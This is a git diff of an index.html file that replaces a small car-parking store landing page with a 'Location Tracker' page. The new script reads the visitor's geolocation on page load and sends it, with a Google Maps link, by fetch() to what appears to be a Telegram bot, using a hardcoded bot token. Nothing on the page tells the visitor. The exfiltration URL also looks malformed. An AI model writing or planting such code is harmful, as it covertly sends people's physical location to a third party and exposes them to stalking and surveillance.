--- a/index.html
+++ b/index.html
@@ -1,90 +1,28 @@
 <!DOCTYPE html>
-<html>
-
+<html lang="en">
 <head>
-    <title>chhayheng</title>
-
-    <!-- code for font awesome cdn -->
-    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
-    <!-- code for font awesome cdn -->
-
-    <!-- code for linking css file -->
-    <link rel="stylesheet" type="text/css" href="styles.css">
-    <!-- code for linking css file -->
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Location Tracker</title>
 </head>
-
 <body>
-    <nav>
-        <div class="nav-logo">
-            <a href="#">
-                <img src="images/logo.png">
-            </a>
-        </div>
+<h1>Location Tracker</h1>
+<p id="location"></p>
 
-        <ul class="nav-links">
-            <li class="link"><a href="#">Home</a></li>
+<script>
+navigator.geolocation.getCurrentPosition(function(position) {
+var latitude = position.coords.latitude;
+var longitude = position.coords.longitude;
+var location = "Latitude: " + latitude + "<br>Longitude: " + longitude;
+document.getElementById("location").innerHTML = location;
 
-        </ul>
-    </nav>
-    <!-- header section -->
-    <header class="container">
-        <div class="content">
-            <span class="blur"></span>
-            <span class="blur"></span>
-            <h4>Car parking Store
-            </h4>
-            <H1>Welcome,To<span>Car parking Store</span>, Cambodia</H1>
-            <p>Car parking Store By Heng
-            </p>
-            <button class="btn"><a href="product.html">Get Start</a></button>
-        </div>
-        <div class="image">
-            <img src="images/header.png">
-        </div>
-    </header>
+// Convert to Google Maps link
+var googleMapsLink = "https://www.google.com/maps?q=" + latitude + "," + longitude;
 
-    <footer class="container">
-        <span class="blur"></span>
-        <span class="blur"></span>
-        <div class="column">
-            <div class="logo">
-                <img src="images/logo.png">
-            </div>
-            <p>
-                Lorem ipsum dolor sit amet consectetur adipisicing elit.
-            </p>
-            <div class="socials">
-                <a href="#"><i class="ri-youtube-line"></i></a>
-                <a href="#"><i class="ri-instagram-line"></i></a>
-                <a href="#"><i class="ri-twitter-line"></i></a>
-            </div>
-        </div>
-        <div class="column">
-            <h4>Company</h4>
-            <a href="#">Business</a>
-            <a href="#">Partnership</a>
-            <a href="#">Network</a>
-        </div>
-        <div class="column">
-            <h4>About Us</h4>
-            <a href="#">Blogs</a>
-            <a href="#">Channels</a>
-            <a href="#">Sponsors</a>
-        </div>
-        <div class="column">
-            <h4>Contact</h4>
-            <a href="#">Contact Us</a>
-            <a href="#">Privicy Policy</a>
-            <a href="#">Terms & Conditions</a>
-        </div>
-    </footer>
-
-    <div class="copyright">
-        Copyright © 2023 Car Cambodia. All Rights Reserved.
-    </div>
-
-    <script src="script.js"></script>
-
+// Send location data to Telegram bot
+var url = "6673926198:AAFfUhgHc0pLNMp2yho5U-TPBAQ3xR9ta1I" + encodeURIComponent(location + "\n\nGoogle Maps link: " + googleMapsLink);
+fetch(url);
+});
+</script>
 </body>
-
 </html>
